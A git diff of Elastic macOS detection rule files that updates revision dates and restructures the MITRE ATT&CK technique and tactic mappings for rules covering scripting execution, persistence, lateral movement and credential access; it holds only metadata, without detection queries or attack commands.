"2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -97,14 +97,18 @@ Automator, a macOS utility, allows users to automate repetitive tasks through wo [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml index f657656b65c..c8652253c2e 100644 --- a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml +++ b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,31 +108,36 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.002" name = "AppleScript" reference = "https://attack.mitre.org/techniques/T1059/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/macos/execution_shell_execution_via_apple_scripting.toml b/rules/macos/execution_shell_execution_via_apple_scripting.toml index 03218b38b18..3c9e5a49850 100644 --- a/rules/macos/execution_shell_execution_via_apple_scripting.toml +++ b/rules/macos/execution_shell_execution_via_apple_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,14 +101,23 @@ AppleScript and JXA are scripting languages used in macOS to automate tasks and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/execution_unusual_library_load_via_python.toml b/rules/macos/execution_unusual_library_load_via_python.toml index 99c96e54eed..74c7555e5d1 100644 --- a/rules/macos/execution_unusual_library_load_via_python.toml +++ b/rules/macos/execution_unusual_library_load_via_python.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,17 +82,22 @@ library where host.os.type == "macos" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml index b89f017f619..e7f5358d96b 100644 --- a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml +++ b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -164,19 +164,61 @@ Microsoft Office applications on macOS can be exploited by adversaries to execut [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml index 23775e46154..2050d05ec37 100644 --- a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml +++ b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,36 +103,79 @@ Kerberos is a network authentication protocol designed to provide secure identit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.002" +name = "Pass the Hash" +reference = "https://attack.mitre.org/techniques/T1550/002/" + [[rule.threat.technique.subtechnique]] id = "T1550.003" name = "Pass the Ticket" reference = "https://attack.mitre.org/techniques/T1550/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" - +[[rule.threat.technique.subtechnique]] +id = "T1558.005" +name = "Ccache Files" +reference = "https://attack.mitre.org/techniques/T1558/005/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.002" +name = "Pass the Hash" +reference = "https://attack.mitre.org/techniques/T1550/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.003" +name = "Pass the Ticket" +reference = "https://attack.mitre.org/techniques/T1550/003/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml index 5d7922d88c6..f8bc0af0692 100644 --- a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml +++ b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,19 +101,31 @@ The `systemsetup` command in macOS is a utility that allows administrators to co [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.004" name = "SSH" reference = "https://attack.mitre.org/techniques/T1021/004/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml index e96f7b9451c..24db77448d6 100644 --- a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml +++ b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,25 +78,45 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Lateral Movement" - id = "TA0008" - reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat.technique]] +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" - [[rule.threat.technique]] - name = "Software Deployment Tools" - id = "T1072" - reference = "https://attack.mitre.org/techniques/T1072/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Software Deployment Tools" - id = "T1072" - reference = "https://attack.mitre.org/techniques/T1072/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[[rule.threat.technique]] +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/lateral_movement_vpn_connection_attempt.toml b/rules/macos/lateral_movement_vpn_connection_attempt.toml index 448fb9b9bff..c284bdb2415 100644 --- a/rules/macos/lateral_movement_vpn_connection_attempt.toml +++ b/rules/macos/lateral_movement_vpn_connection_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,14 +105,26 @@ Virtual Private Networks (VPNs) are used to securely connect to remote networks, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/macos/persistence_account_creation_hide_at_logon.toml b/rules/macos/persistence_account_creation_hide_at_logon.toml index 8ffa3621827..aad29d1ee6c 100644 --- a/rules/macos/persistence_account_creation_hide_at_logon.toml +++ b/rules/macos/persistence_account_creation_hide_at_logon.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,19 +98,46 @@ In macOS environments, the `dscl` command-line utility manages directory service [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.003" name = "Local Accounts" reference = "https://attack.mitre.org/techniques/T1078/003/" +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" +[[rule.threat.technique.subtechnique]] +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique.subtechnique]] +id = "T1564.002" +name = "Hidden Users" +reference = "https://attack.mitre.org/techniques/T1564/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/macos/persistence_apple_mail_rule_modification.toml b/rules/macos/persistence_apple_mail_rule_modification.toml index 4e7a49b2daa..5c61bee11fd 100644 --- a/rules/macos/persistence_apple_mail_rule_modification.toml +++ b/rules/macos/persistence_apple_mail_rule_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,25 +81,38 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique]] - name = "Event Triggered Execution" - id = "T1546" - reference = "https://attack.mitre.org/techniques/T1546/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique]] - name = "User Execution" - id = "T1204" - reference = "https://attack.mitre.org/techniques/T1204/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1647" +name = "Plist File Modification" +reference = "https://attack.mitre.org/techniques/T1647/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/macos/persistence_creation_change_launch_agents_file.toml b/rules/macos/persistence_creation_change_launch_agents_file.toml index 25970d8647b..b194c48c852 100644 --- a/rules/macos/persistence_creation_change_launch_agents_file.toml +++ b/rules/macos/persistence_creation_change_launch_agents_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,19 +100,41 @@ Launch Agents in macOS are used to execute scripts or applications automatically [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.001" name = "Launch Agent" reference = "https://attack.mitre.org/techniques/T1543/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.001" +name = "Launchctl" +reference = "https://attack.mitre.org/techniques/T1569/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/persistence_creation_hidden_login_item_osascript.toml b/rules/macos/persistence_creation_hidden_login_item_osascript.toml index 1dd6607c7eb..374da22f80c 100644 --- a/rules/macos/persistence_creation_hidden_login_item_osascript.toml +++ b/rules/macos/persistence_creation_hidden_login_item_osascript.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -97,43 +97,49 @@ AppleScript is a scripting language for automating tasks on macOS, including man [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.015" +name = "Login Items" +reference = "https://attack.mitre.org/techniques/T1547/015/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.002" name = "AppleScript" reference = "https://attack.mitre.org/techniques/T1059/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1647" name = "Plist File Modification" reference = "https://attack.mitre.org/techniques/T1647/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml index 15e61637816..2dc6bcf3a2c 100644 --- a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml +++ b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/13" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,19 +103,31 @@ Authorization plugins in macOS extend authentication capabilities, enabling feat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/macos/persistence_crontab_creation.toml b/rules/macos/persistence_crontab_creation.toml index 0fd47fdaa86..3610bd457f7 100644 --- a/rules/macos/persistence_crontab_creation.toml +++ b/rules/macos/persistence_crontab_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,19 +100,36 @@ Cron is a time-based job scheduler in Unix-like operating systems, including mac [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/persistence_curl_execution_via_shell_profile.toml b/rules/macos/persistence_curl_execution_via_shell_profile.toml index 7be128e76cb..0d180ea6743 100644 --- a/rules/macos/persistence_curl_execution_via_shell_profile.toml +++ b/rules/macos/persistence_curl_execution_via_shell_profile.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,30 +81,48 @@ sequence with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique]] - name = "Event Triggered Execution" - id = "T1546" - reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell Configuration Modification" - id = "T1546.004" - reference = "https://attack.mitre.org/techniques/T1546/004/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat.technique]] - name = "Ingress Tool Transfer" - id = "T1105" - reference = "https://attack.mitre.org/techniques/T1105/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml index 1feff70a4d6..40c2556197f 100644 --- a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml +++ b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,36 +103,41 @@ Launchd is a key macOS system process responsible for managing system and user s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.001" name = "Launch Agent" reference = "https://attack.mitre.org/techniques/T1543/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_directory_services_plugins_modification.toml b/rules/macos/persistence_directory_services_plugins_modification.toml index 851527cc2f2..6a540301235 100644 --- a/rules/macos/persistence_directory_services_plugins_modification.toml +++ b/rules/macos/persistence_directory_services_plugins_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/13" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,14 +98,18 @@ DirectoryService PlugIns on macOS are integral for managing directory-based serv [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_docker_shortcuts_plist_modification.toml b/rules/macos/persistence_docker_shortcuts_plist_modification.toml index 60cccae6d72..5e68169bfdf 100644 --- a/rules/macos/persistence_docker_shortcuts_plist_modification.toml +++ b/rules/macos/persistence_docker_shortcuts_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,14 +102,23 @@ Docker shortcuts on macOS are managed through dock property lists, which define [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.009" +name = "Shortcut Modification" +reference = "https://attack.mitre.org/techniques/T1547/009/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_emond_rules_file_creation.toml b/rules/macos/persistence_emond_rules_file_creation.toml index aceae728df5..d163f01c87e 100644 --- a/rules/macos/persistence_emond_rules_file_creation.toml +++ b/rules/macos/persistence_emond_rules_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,19 +99,36 @@ The Event Monitor Daemon (emond) on macOS is a service that executes commands ba [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.014" name = "Emond" reference = "https://attack.mitre.org/techniques/T1546/014/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.014" +name = "Emond" +reference = "https://attack.mitre.org/techniques/T1546/014/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/persistence_emond_rules_process_execution.toml 